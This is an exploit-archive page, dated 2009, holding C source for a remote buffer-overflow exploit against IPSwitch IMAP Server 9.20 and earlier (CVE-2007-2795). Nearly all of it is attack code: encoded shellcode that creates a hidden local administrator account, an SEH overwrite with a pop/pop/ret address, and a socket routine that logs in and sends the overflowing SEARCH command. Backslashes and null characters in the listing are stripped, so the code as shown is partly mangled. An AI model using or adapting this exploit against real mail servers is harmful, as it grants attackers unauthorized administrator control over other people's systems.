[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IPSwitch IMAP Server <= 9.20 Remote Buffer Overflow Exploit
# Published : 2009-09-14
# Author : dmc
# Previous Title : Techlogica HTTP Server 1.03 Arbitrary File Disclosure Exploit
# Next Title : Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit
/* Ipsbitch.cpp vs Ipswitch IMAP
* Tested on: Windows 2000 SP4
* Ref: CVE-2007-2795
*
* Author: Dominic Chell <dmc@deadbeef.co.uk>
* Found this half written on a VM so decided to finish it.
*
* Payload adds a local admin account USER=r00t PASS=r00tr00t!!
*
*/
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#define usage(){ (void)fprintf(stderr, "Ipsbitch vs Ipswitch IMAP <=v9.20n(C) dmc <dmc@deadbeef.co.uk>nnExample: ipsbitch.exe [ip] [port] [user] [password]n");}
#define error(e){ (void)fprintf(stderr,"%sn",e); return -1;}
// USER=r00t PASS=r00tr00t!!
// Bad Chars = 'x00x0ax0dx0bx09x0cx20'
// Encoded with shikata ga nai
char shellcode[] =
"xdaxd4x29xc9xb8xb3xfex8bx54xd9x74x24xf4xb1x32"
"x5fx83xefxfcx31x47x14x03x47xa7x1cx7exa8x2fxa4"
"x81x51xafxaexc7x6dx24xccxc2xf5x3bxc2x46x4ax23"
"x97x06x75x52x4cxf1xfex60x19x03xefxb9xddx9dx43"
"x3dx1dxe9x9cxfcx54x1fxa2x3cx83xd4x9fx94x70x11"
"x95xf1xf2x46x71xf8xefx1fxf2xf6xa4x54x5bx1ax3a"
"x80xefx3exb7x57x1bxb7x9bx73xdfx04x7cx4dx29xea"
"xd5xc9x5exacxe9x9ax21x3cx81xedxbdx91x1ex65xb6"
"x60xd8xf5x06x18x49x92x76x56x6dx3dx1fxfex90x4b"
"xd1xa9x93xabx8dx38x08x1ax37xbaxb5x42x98x59x16"
"xedx83xe9x76x84x38x74x05x46xcdx46xd9xf2x11xd4"
"x29xcbx25x6ax7ax1bxb2xabx5bx7bx15xeaxdfx3fx49"
"xcaxf9x9fxe7x77x72xc0x9bx18x19x61x08x81xafx0e"
"xa5x3dx70x90x21xd0x19x7cxc3x59xaexf2x72xe9x21"
"x81x07x31xccx55xd8x45x10xb9x59xe1x14xc5x53";
char *seh = "xC4x2Ax02x75";
//ws2help.dll - 0x75022AC4 - pop/pop/ret
char *nextseh = "xebx10x90x90";
// short jmp nop nop
int main(int argc, char *argv[])
{
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
char user[20], pass[20];
char payload[2048];
char recvbuf[1024];
if(argc < 4)
{
usage();
return 0;
}
if((strlen(argv[3])<15) && (strlen(argv[4])<15))
{
strncpy(user, argv[3], 14);
strncpy(pass, argv[4], 14);
user[14] = '�';
pass[14] = '�';
}
else {
usage();
return 0;
}
int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);;
fprintf(stderr, "Ipsbitch vs Ipswitch IMAP <=v9.20n(C) dmc <dmc@deadbeef.co.uk>nn");
char auth[50];
memset(auth, 0, sizeof(auth));
memset(recvbuf, 0, sizeof(recvbuf));
strcat(auth, "0 LOGIN ");
strcat(auth, user);
strcat(auth, " ");
strcat(auth, pass);
strcat(auth, "rn");
strcat(auth, "�");
memset(payload, 0, sizeof(payload));
strcat(payload, "2 SEARCH BEFORE ");
for(int i=0; i<80; i++) strcat(payload, "x90");
strcat(payload, nextseh);
strcat(payload, seh);
for(int i=0; i<100; i++) strcat(payload, "x90");
strcat(payload, shellcode);
for(int i=0; i<300; i++) strcat(payload, "x90");
strcat(payload, "rn");
WSADATA info;
if (WSAStartup(MAKEWORD(2,0), &info)) error("Unable to start WSA");
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET) error("[*] socket error");
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ipaddr);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
select(s+1,NULL,&mask,NULL,&timeout);
if(FD_ISSET(s,&mask))
{
fprintf(stderr, "[*] Connecting to IMAP servern");
Sleep(1000);recv(s,recvbuf,200,0);
fprintf(stderr, "[*] Got banner:n%sn", recvbuf);
memset(recvbuf, 0, sizeof(recvbuf));
fprintf(stderr, "[*] Authenticating...n");
if (send(s,auth,strlen(auth),0)==SOCKET_ERROR) error("[*] error sending auth payload");
memset(auth, 0, sizeof(auth));
Sleep(1000);recv(s,recvbuf,200,0);
fprintf(stderr, "[*] Received:n%sn", recvbuf);
memset(recvbuf, 0, sizeof(recvbuf));
fprintf(stderr, "[*] Sending SELECT command...n");
if (send(s,"1 SELECT INBOXrn",strlen("1 SELECT INBOXrn"),0)==SOCKET_ERROR) error("[*] error sending auth payload");
Sleep(1000);recv(s,recvbuf,200,0);
fprintf(stderr, "[*] Received:n%sn", recvbuf);
memset(recvbuf, 0, sizeof(recvbuf));
Sleep(1000);recv(s,recvbuf,200,0);
fprintf(stderr, "[*] Received:n%sn", recvbuf);
fprintf(stderr, "[*] Sending exploit payload...n");
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) error("[*] error sending exploit payload");
memset(payload, 0, sizeof(payload));
fprintf(stderr, "[*] Now try USER=r00t PASS=r00tr00t!!n");
return 0;
}
}
// www.Syue.com [2009-09-14]